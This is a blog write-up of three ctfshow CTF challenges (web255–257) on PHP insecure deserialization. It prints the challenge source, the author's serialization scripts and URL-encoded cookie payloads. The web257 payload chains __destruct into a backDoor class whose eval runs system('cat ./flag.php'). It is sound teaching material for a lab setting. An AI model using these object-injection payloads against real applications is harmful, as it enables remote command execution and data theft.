当前位置:网站首页>ctfshow web255 web 256 web257
ctfshow web255 web 256 web257
2022-07-04 08:15:00 【Jiang Xiaozi】
Catalog
web255
The attached code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}The overall idea is almost the same as the previous question, but there is only one more sentence
$user = unserialize($_COOKIE['user']); You can see unserialize It's deserialization , So we need to serialize something , adopt cookie Of user The variable passed in , Change this data .
public function login($u,$p){
return $this->username===$u&&$this->password===$p;This code cannot make isVip by true, So we need to go through user This variable changes isVip Value .
Just bring the class , Only classes and variables will be deserialized , Everything else can be removed .
<?php
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=true;
}
echo(urlencode(serialize(new ctfShowUser())));
?>
So the input parameter is
Get flag, Debt see !!
web256
The attached code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
if($this->username!==$this->password){
echo "your flag is ".$flag;
}
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
The key point of this question is username and password It's not equal , Because they are all strong comparisons , So we introduced username and password Different values are OK , Pay attention to cookie Involved in user Of username and password We need to change
So what we should introduce at this time is
?username=1&password=2<?php
class ctfShowUser{
public $username='1';
public $password='2';
public $isVip=true;
}
echo(urlencode(serialize(new ctfShowUser())));
?>O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
Get flag, Debt see !
web257
The attached code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
class ctfShowUser{
private $username='xxxxxx';
private $password='xxxxxx';
private $isVip=false;
private $class = 'info';
public function __construct(){
$this->class=new info();
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo();
}
}
class info{
private $user='xxxxxx';
public function getInfo(){
return $this->user;
}
}
class backDoor{
private $code;
public function getInfo(){
eval($this->code);
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
$user->login($username,$password);
}This problem begins to involve the magic method of deserialization , I have written an article before php Introduction of common magic methods of deserialization
Let's go back to this question , Finally, we need to use backDoor Class eval function , To execute an order
Combine the method of the previous question , Look at this question step by step ,construct Method is triggered when initializing a class , there construct Method initializes info() This class , Trigger when destroying destruct Method ,destruct Method trigger will call info() Class getInfo Method , Then return user The value of the object , Here we see what we want to call backDoor Methods in classes are also called getInfo(), So we can serialize __construct Method initializes classes from info Change it to backDoor.
The specific implementation method is as follows :
<?php
class ctfShowUser{
private $username='xxxxxx';
private $password='xxxxxx';
private $isVip=true;
private $class = 'info';
public function __construct(){
$this->class=new backDoor();
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo();
}
}
class backDoor{
private $code='system("cat ./flag.php");';
public function getInfo(){
eval($this->code);
}
}
echo(urlencode(serialize(new ctfShowUser())));As usual
?username=xxxxxx&password=xxxxxxCookie: user=O%3A11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A21%3A%22%00ctfShowUser%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A21%3A%22%00ctfShowUser%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A18%3A%22%00ctfShowUser%00isVip%22%3Bb%3A1%3Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A25%3A%22system%28%22cat+.%2Fflag.php%22%29%3B%22%3B%7D%7D
Get flag, Debt see !!
边栏推荐
- Oracle-存储过程与函数
- Use preg_ Match extracts the string into the array between: & | people PHP
- snipaste 方便的截图软件,可以复制在屏幕上
- 广和通高性能4G/5G无线模组解决方案全面推动高效、低碳智能电网
- 1. Kalman filter - the best linear filter
- zabbix监控系统部署
- Put a lantern on the website during the Lantern Festival
- Fault analysis | MySQL: unique key constraint failure
- How to use MOS tube to realize the anti reverse connection circuit of power supply
- DM8 tablespace backup and recovery
猜你喜欢
Comprendre la méthode de détection des valeurs aberrantes des données
L2-013 red alarm (C language) and relevant knowledge of parallel search
Common components of flask
Azure ad domain service (II) configure azure file share disk sharing for machines in the domain service
Unity text superscript square representation +text judge whether the text is empty
C#,数值计算(Numerical Recipes in C#),线性代数方程的求解,Gauss-Jordan消去法,源代码
![[test de performance] lire jmeter](/img/c9/25a0df681c7ecb4a0a737259c882b3.png)
[test de performance] lire jmeter
【性能測試】一文讀懂Jmeter
Preliminary study on temporal database incluxdb 2.2
【性能测试】一文读懂Jmeter
随机推荐
Moher college phpMyAdmin background file contains analysis traceability
WordPress get_ Users() returns all users with comparison queries - PHP
1. Kalman filter - the best linear filter
snipaste 方便的截图软件,可以复制在屏幕上
How to write a summary of the work to promote the implementation of OKR?
Chrome is set to pure black
【性能测试】一文读懂Jmeter
Unity-写入Word
L1-026 I love gplt (5 points)
L2-013 red alarm (C language) and relevant knowledge of parallel search
1. Getting started with QT
ZABBIX monitoring system custom monitoring content
yolov5 xml数据集转换为VOC数据集
如何用MOS管来实现电源防反接电路
zabbix监控系统部署
促进OKR落地的工作总结该如何写?
广和通高性能4G/5G无线模组解决方案全面推动高效、低碳智能电网
DM8 tablespace backup and recovery
deno debugger
Using the rate package for data mining